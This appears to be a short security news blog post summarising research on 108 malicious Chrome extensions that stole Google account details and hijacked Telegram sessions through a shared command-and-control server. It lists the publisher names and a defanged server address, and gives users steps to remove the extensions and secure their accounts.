Over 100 malicious Chrome extensions discovered: Stealing Google and Telegram accounts from tens of thousands
- Apr 15
- 2 min read
Chrome browser extensions are powerful tools that help us work and entertain more efficiently. However, behind that helpful facade sometimes lie sophisticated traps. Recently, cybersecurity experts exposed a large-scale campaign using a series of malicious extensions to target users.
Attack scale and sophisticated "camouflage"
According to a report from Socket, a total of 108 Chrome extensions have been found engaging in data theft. Notably, although released under five different developer names (including Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt), they all actually connect to a common command-and-control (C2) server system.
This campaign successfully tricked approximately 20,000 users into installing them via the Chrome Web Store. To gain trust, the attackers disguised these pieces of malware in various forms, such as:
Entertainment games (racing, slots, Keno).
Social media tools (add-ons for YouTube and TikTok, or sidebars for Telegram).
Translation applications and website optimization tools.
How the malware operates and exfiltrates information
Despite being presented as support tools, once activated, these extensions silently perform serious privacy violations. Specifically:
Targeting Google accounts: 54 extensions in this list specialize in stealing Google login credentials (via the OAuth2 protocol), including the victim's email, full name, and profile picture.
Hijacking Telegram: Some extensions are capable of extracting Telegram Web authentication codes every 15 seconds. They can even overwrite data to replace the user's session with an account controlled by the attacker.
Disabling browser security: Many extensions have arbitrarily removed security headers from major websites like YouTube or TikTok. The goal is to inject gambling advertisements or malicious JavaScript snippets into the websites the user is visiting.
Behavioral tracking: Any translation requests or browsing data can be redirected through the attacker's servers to collect information.
Additionally, nearly half of these extensions (45) contain a backdoor, allowing attackers to automatically open any website as soon as the user launches their browser.
Traces left behind and the identity of the perpetrators
Through source code analysis, researchers found numerous comments written in Russian. All 108 extensions sent data to a single server IP address (144.126.135[.]238). Although the exact identity of the hacking group has not yet been determined, evidence suggests this is an organized campaign utilizing a shared technical infrastructure.
![108 extensions sent data to a single server IP address (144.126.135[.]238)](https://static.wixstatic.com/media/a35390_55409416781e49b490932ff5e5270f19~mv2.jpg/v1/fill/w_980,h_826,al_c,q_85,usm_0.66_1.00_0.01,enc_avif,quality_auto/a35390_55409416781e49b490932ff5e5270f19~mv2.jpg)
Some typical names in this malicious list include: Telegram Multi-account, Web Client for Telegram - Teleside, and the Formula Rush Racing Game.
What should users do to protect themselves?
If you suspect you have installed an extension from the developers mentioned above, take the following steps immediately to ensure your safety:
Immediate removal: Access the extension management section in Chrome and delete any applications of unknown origin or those listed in warning reports.
Terminate remote sessions: For Telegram users, access the app on your phone, check the list of active devices, and select "Log out from all other sessions" to terminate Telegram Web sessions.
Review account security: Change your passwords and review the application access permissions of your Google account to ensure no third party is silently harvesting your data.
Remaining vigilant with browser extensions - even those available on official stores - is absolutely essential in the context of increasingly sophisticated modern cyber attacks.
Reference: The Hacker News
Comments